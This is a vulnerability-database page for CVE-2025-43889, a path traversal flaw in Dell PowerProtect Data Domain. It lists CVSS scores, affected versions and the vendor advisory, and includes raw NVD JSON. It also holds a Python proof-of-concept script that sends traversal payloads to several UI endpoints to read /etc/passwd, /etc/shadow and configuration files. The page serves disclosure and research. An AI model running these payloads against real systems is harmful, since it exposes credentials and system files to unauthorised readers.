Security Vulnerability Report
CVE-2025-43889 CVSS 5.3 MEDIUM

Published: 2025-10-07 19:15:37
Last Modified: 2025-10-14 20:11:45

Description

Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) Feature Release versions 7.7.1.0 through 8.4, LTS2024 release versions 7.13.1.0 through 7.13.1.30, and LTS2023 release versions 7.10.1.0 through 7.10.1.60 contain an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in the UI. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to information exposure.

CVSS Details

CVSS Score (Secondary metric, vendor-supplied)
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVSS Score (Primary metric, NVD analysis, from the raw JSON record below)
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Weakness
CWE-22
Note: the two metrics differ only in confidentiality impact (C:L vs C:H); the NVD analysis rates the information exposure as HIGH.

Configurations (Affected Products)

NVD CPE match criteria (version ranges taken from the raw JSON record below):
cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:* - VULNERABLE (from 7.7.1.0, up to but excluding 7.10.1.70)
cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:* - VULNERABLE (from 7.13.1.0, up to but excluding 7.13.1.40)
cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:* - VULNERABLE (from 8.0.0.0, up to but excluding 8.5.0.0)

Vendor-stated affected release trains:
Dell PowerProtect Data Domain DD OS Feature Release 7.7.1.0 - 8.4
Dell PowerProtect Data Domain DD OS LTS2024 7.13.1.0 - 7.13.1.30
Dell PowerProtect Data Domain DD OS LTS2023 7.10.1.0 - 7.10.1.60

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-43889 - Dell PowerProtect Data Domain Path Traversal PoC
# Path traversal vulnerability in the UI component
# Attacker can read files outside the restricted directory
import requests
import sys

TARGET = sys.argv[1] if len(sys.argv) > 1 else "https://target-data-domain.example.com"
PORT = 443

# Path traversal payloads to test
payloads = [
    "/../../../../etc/passwd",
    "/..%2f..%2f..%2f..%2fetc/passwd",
    "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
    "/../../../../etc/shadow",
    "/../../../../data/config/dd.conf",
    "/../../../opt/ddrm/etc/ddr.conf",
    "/..\\..\\..\\..\\windows\\system32\\drivers\\etc\\hosts",
]


def exploit_path_traversal(target_url, payload):
    """
    Attempt path traversal on Dell PowerProtect Data Domain UI
    """
    headers = {
        "User-Agent": "Mozilla/5.0 (compatible; SecurityResearcher/1.0)",
        "Accept": "*/*",
        "Connection": "close",
    }
    # Try various UI endpoints that may be vulnerable
    endpoints = [
        f"{target_url}/ui{payload}",
        f"{target_url}/restui{payload}",
        f"{target_url}/ddrm{payload}",
        f"{target_url}/api/v1{payload}",
    ]
    for endpoint in endpoints:
        try:
            response = requests.get(
                endpoint,
                headers=headers,
                verify=False,
                timeout=10,
                allow_redirects=False,
            )
            # Check for successful path traversal
            if response.status_code == 200 and len(response.content) > 0:
                if b"root:" in response.content or b"[ddrm]" in response.content:
                    print(f"[+] VULNERABLE: {endpoint}")
                    print(f"[+] Response:\n{response.text[:500]}")
                    return True
        except requests.exceptions.RequestException:
            continue
    return False


if __name__ == "__main__":
    print(f"[*] Testing CVE-2025-43889 against {TARGET}")
    for payload in payloads:
        print(f"[*] Trying payload: {payload}")
        if exploit_path_traversal(TARGET, payload):
            print("[+] Exploit successful!")
            break
    else:
        # for/else: runs only when no payload succeeded
        print("[-] Target does not appear vulnerable")

References

https://www.dell.com/support/kbdoc/en-us/000376224/dsa-2025-333-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities (Vendor Advisory, DSA-2025-333)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-43889", "sourceIdentifier": "[email protected]", "published": "2025-10-07T19:15:36.800", "lastModified": "2025-10-14T20:11:45.030", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.4, LTS2024 release Versions 7.13.1.0 through 7.13.1.30, LTS 2023 release versions 7.10.1.0 through 7.10.1.60, contain an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in the UI. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Information exposure."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": 
"7.7.1.0", "versionEndExcluding": "7.10.1.70", "matchCriteriaId": "7FCE50EA-F2B8-4455-A489-1947B0CBFEEA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.13.1.0", "versionEndExcluding": "7.13.1.40", "matchCriteriaId": "C0EA46C5-6776-411A-8FBC-5B32BC216888"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0.0", "versionEndExcluding": "8.5.0.0", "matchCriteriaId": "F5464021-E415-4D49-AE89-8190C9D4D6FA"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000376224/dsa-2025-333-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}